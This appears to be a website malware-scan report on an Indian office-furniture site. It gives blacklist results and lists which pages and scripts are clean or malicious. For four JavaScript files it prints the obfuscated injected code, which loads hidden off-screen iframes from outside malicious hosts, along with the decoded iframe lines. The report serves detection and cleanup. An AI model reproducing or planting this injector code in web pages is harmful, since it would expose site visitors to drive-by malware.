Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=royalofficefurniture.in
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://royalofficefurniture.in/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://royalofficefurniture.in/ | 200 OK Content-Length: 69769 Content-Type: text/html | clean |
http://royalofficefurniture.in/js/jquery-1.2.2.pack.js | 200 OK Content-Length: 3619 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function ddd_prover_ua(){ var igmorList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox } if (!ddd_prover_ua()) { var cookie = getCookie('nairi20li7na3pro'+'poln19ne71ver10la'); if (cookie == undefined) { setCookie('nairi20li7na3pro'+'poln19ne71ver10la', true, 86401); document.write('<i'+'f'+'ra'+'me s'+'rc='+'"http://vavagen.ronan.io/jtyrkjytdk7.html" style="position:absolute;left:-'+'1311'+'px;top:-'+'1311px;" height="130" width="130" name="Nairi"></'+'i'+'fra'+'me>'); } } })(); Decoded script: <iframe src="http://bebefruit.taurineromania.ro/haeesdhreh.cgi?7" style="position:absolute;left:-1311px;top:-1311px;" height="130" width="130" name="Nairi"></iframe> Antivirus reports:
| ||
http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js | 200 OK Content-Length: 57254 Content-Type: text/javascript | clean |
http://royalofficefurniture.in/jquery.magnifier.js | 200 OK Content-Length: 3635 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function ddd_prover_ua(){ var igmorList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox } if (!ddd_prover_ua()) { var cookie = getCookie('nairi20li7na3pro'+'poln19ne71ver10la'); if (cookie == undefined) { setCookie('nairi20li7na3pro'+'poln19ne71ver10la', true, 86401); document.write('<i'+'f'+'ra'+'me s'+'rc='+'"http://vavagen.sanibelarms.com/jtrkrsyueru7.html" style="position:absolute;left:-'+'1311'+'px;top:-'+'1311px;" height="130" width="130" name="Nairi"></'+'i'+'fra'+'me>'); } } })(); Decoded script: <iframe src="http://bebefruit.taurineromania.ro/haeesdhreh.cgi?7" style="position:absolute;left:-1311px;top:-1311px;" height="130" width="130" name="Nairi"></iframe> Antivirus reports:
| ||
http://royalofficefurniture.in/js/ddaccordion.js | 200 OK Content-Length: 3631 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function ddd_prover_ua(){ var igmorList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox } if (!ddd_prover_ua()) { var cookie = getCookie('nairi20li7na3pro'+'poln19ne71ver10la'); if (cookie == undefined) { setCookie('nairi20li7na3pro'+'poln19ne71ver10la', true, 86401); document.write('<i'+'f'+'ra'+'me s'+'rc='+'"http://vavagen.powercatfan.com/awwgrru.cgi?7" style="position:absolute;left:-'+'1311'+'px;top:-'+'1311px;" height="130" width="130" name="Nairi"></'+'i'+'fra'+'me>'); } } })(); Decoded script: <iframe src="http://bebefruit.taurineromania.ro/haeesdhreh.cgi?7" style="position:absolute;left:-1311px;top:-1311px;" height="130" width="130" name="Nairi"></iframe> Antivirus reports:
| ||
http://royalofficefurniture.in/js/navigation.js | 200 OK Content-Length: 1820 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function ddd_prover_ua(){ var igmorList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox } if (!ddd_prover_ua()) { var cookie = getCookie('nairi20li7na3pro'+'poln19ne71ver10la'); if (cookie == undefined) { setCookie('nairi20li7na3pro'+'poln19ne71ver10la', true, 86401); document.write('<i'+'f'+'ra'+'me s'+'rc='+'"http://bebefruit.taurineromania.ro/haeesdhreh.cgi?7" style="position:absolute;left:-'+'1311'+'px;top:-'+'1311px;" height="130" width="130" name="Nairi"></'+'i'+'fra'+'me>'); } } })(); Decoded script: <iframe src="http://bebefruit.taurineromania.ro/haeesdhreh.cgi?7" style="position:absolute;left:-1311px;top:-1311px;" height="130" width="130" name="Nairi"></iframe> Antivirus reports:
| ||
http://royalofficefurniture.in/index.html | 200 OK Content-Length: 69769 Content-Type: text/html | clean |
http://royalofficefurniture.in/about-us.html | 200 OK Content-Length: 75484 Content-Type: text/html | clean |
http://royalofficefurniture.in/product.html | 200 OK Content-Length: 89415 Content-Type: text/html | clean |
http://royalofficefurniture.in/enquiry.html | 200 OK Content-Length: 70979 Content-Type: text/html | clean |
http://royalofficefurniture.in/contacts.html | 200 OK Content-Length: 70847 Content-Type: text/html | clean |
http://royalofficefurniture.in/hospital-furniture.html | 200 OK Content-Length: 96266 Content-Type: text/html | clean |
http://royalofficefurniture.in/institutional-furniture.html | 200 OK Content-Length: 79207 Content-Type: text/html | clean |
http://royalofficefurniture.in/office-furniture.html | 200 OK Content-Length: 77933 Content-Type: text/html | clean |
http://royalofficefurniture.in/modular-furniture.html | 200 OK Content-Length: 75429 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: royalofficefurniture.in
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 Jun 2014 20:34:06 GMT
Accept-Ranges: bytes
ETag: "ca4e28-11089-4cf126635b780"
Server: Apache
Content-Length: 69769
Content-Type: text/html; charset=UTF-8
Last-Modified: Thu, 22 Nov 2012 09:50:38 GMT
...69769 bytes of data.
GET / HTTP/1.1
Host: royalofficefurniture.in
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 Jun 2014 20:34:06 GMT
Accept-Ranges: bytes
ETag: "ca4e28-11089-4cf126635b780"
Server: Apache
Content-Length: 69769
Content-Type: text/html; charset=UTF-8
Last-Modified: Thu, 22 Nov 2012 09:50:38 GMT
...69769 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: royalofficefurniture.in
Referer: http://www.google.com/search?q=royalofficefurniture.in
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: royalofficefurniture.in
Referer: http://www.google.com/search?q=royalofficefurniture.in
Result:
The result is similar to the first query. There are no suspicious redirects found.